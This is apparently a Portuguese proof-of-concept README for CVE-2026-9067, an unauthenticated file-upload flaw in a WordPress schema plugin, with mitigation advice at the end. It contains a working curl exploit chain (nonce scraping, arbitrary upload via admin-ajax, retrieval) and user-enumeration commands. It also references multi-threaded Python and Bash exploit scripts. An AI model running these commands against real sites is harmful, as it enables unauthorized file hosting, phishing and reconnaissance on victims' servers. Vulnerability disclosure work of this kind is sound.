POC & Xploit - Diretório de Prova de Conceito
Documentação e exploits para vulnerabilidades encontradas no ambiente de testes de segurança do WordPress.
Lista de Vulnerabilidades
| CVE ID | Plugin | Gravidade | Tipo | Status |
|---|
| CVE-2026-9067 | Schema & Structured Data for WP & AMP | Alta (8.1) | Upload de Arquivo sem Restrições | Documentado |
CVE-2026-9067
Resumo Rápido
Descrição da Vulnerabilidade
O plugin Schema & Structured Data for WP & AMP antes da versão 1.60 não valida a capability do usuário nos handlers de AJAX para upload de arquivos e não valida o tipo de arquivo enviado. Isso permite que um atacante não autenticado faça upload de arquivos arbitrários.
Impacto
- Hospedagem de Conteúdo: o atacante pode hospedar conteúdo malicioso no domínio da vítima
- Consumo de Disco: o upload de arquivos arbitrários pode esgotar o espaço em disco
- Abuso de Reputação: distribuição de malware e páginas de phishing a partir do domínio da vítima
Nota Importante: o núcleo do WordPress bloqueia arquivos executáveis (.php, .phtml, .html, .svg), portanto não há caminho direto de RCE a partir dessa vulnerabilidade.
Arquivos
CVE-2026-9067/
├── CVE-2026-9067.md # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py # Python exploit dengan multi-threading
├── CVE-2026-9067.sh # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh # Alternative Bash PoC
PoC Rápido
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)
# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
-F 'action=saswp_rf_form_image_upload' \
-F "saswp_rf_form_nonce=$NONCE" \
-F '[email protected];type=image/png;filename=evil.csv'
# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
Comandos de Teste
Verificar o Status do Site
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
Verificar a Versão do Plugin
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
Enumerar Usuários
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
- Atualizar o Plugin: atualize o Schema & Structured Data for WP & AMP para a versão 1.60 ou mais recente
- Desativar o Plugin: se a atualização não for possível, desative o plugin
- Hardening:
- Defina a constante
DISALLOW_FILE_MODIFICATIONS
- Desative a execução de PHP no diretório de uploads via
.htaccess
- Implemente regras de WAF
Referências